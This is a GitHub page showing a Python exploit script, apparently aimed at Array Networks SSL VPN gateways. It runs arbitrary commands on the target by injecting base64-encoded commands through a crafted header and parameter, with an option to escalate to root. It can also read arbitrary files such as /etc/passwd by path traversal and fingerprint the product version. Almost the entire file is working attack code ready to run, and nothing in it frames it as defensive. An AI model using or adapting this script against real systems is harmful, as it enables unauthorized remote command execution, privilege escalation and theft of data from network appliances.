-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy patharray_exp.py
70 lines (61 loc) · 2.61 KB
/
array_exp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
import requests,sys,argparse
import warnings,re
import urllib.parse,base64
warnings.filterwarnings('ignore')
headers = {
"User-Agent": "Mozilla/5.0 (X11; Windows x86_64; rv:109.0) Gecko/20100101 Firefox/111.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
}
def Exec(ip_,cmd,flag):
uri = "/prx/000/http/localhost/client_sec%2f..%2fcifs"
url = ip_+uri
if flag:
cmd_base64=base64.b64encode('/ca_upgrade/ca/bin/webui_localdb_file c "|{}"'.format(cmd).encode('utf-8'))
else:
cmd_base64=base64.b64encode(cmd.encode('utf-8'))
params = {
'service': '//AfterLogOnCmd: command not found/temp/',
'path': "|echo {} | perl -MMIME::Base64 -ne 'system(decode_base64($_))'|".format(cmd_base64.decode("utf-8"))
}
headers["X_AN_FILESHARE"]="acls=permit"
resp = requests.get(url,params=params, headers=headers,verify=False,allow_redirects=False)
print(resp.text)
def PathCrossing(ip_,path):
uri = "/prx/000/http/localhost/client_sec%2f..%2faddfolder"
url = ip_+uri
headers["X_AN_FILESHARE"] = "fshare_template=../../..{};".format(path)
resp = requests.get(url, headers=headers,verify=False)
pattern = r'(?<=<script\slanguage="JavaScript"\ssrc="\/prx\/001\/http\/localhost\/NSLib\.js"><\/script>)[\s\S]*(?=<tr>\n<td class="title">No message available<\/td>)'
result = re.search(pattern, resp.text)
if result:
print(result.group(0))
else:
print(resp.text)
def GetVersion(ip_):
uri = "/prx/001/http/localhost/NSLib.js"
url = ip_+uri
resp = requests.get(url, headers=headers,verify=False,allow_redirects=False)
pattern = r'src="\/prx\/001\/http\/localhost\/NSLib\.js\?v=([^\"]*)"'
matches = re.findall(pattern, resp.text)
if len(matches) > 1 :
print(matches[0])
else:
print("Get version error")
def main():
parser = argparse.ArgumentParser(description="-m exec|path|version -u url -e whoami|/etc/passwd")
parser.add_argument('-m',help='exec or path or version')
parser.add_argument('-u', help='url')
parser.add_argument('-e', help='Command to run or path to access')
parser.add_argument('--root',help='Get root by webui_localdb_file',action='store_true')
args = parser.parse_args()
if args.m == "exec":
Exec(args.u,args.e,args.root)
elif args.m == "path":
PathCrossing(args.u,args.e)
elif args.m == "version":
GetVersion(args.u)
else:
print('module error, exec or path')
if __name__ == '__main__':
main()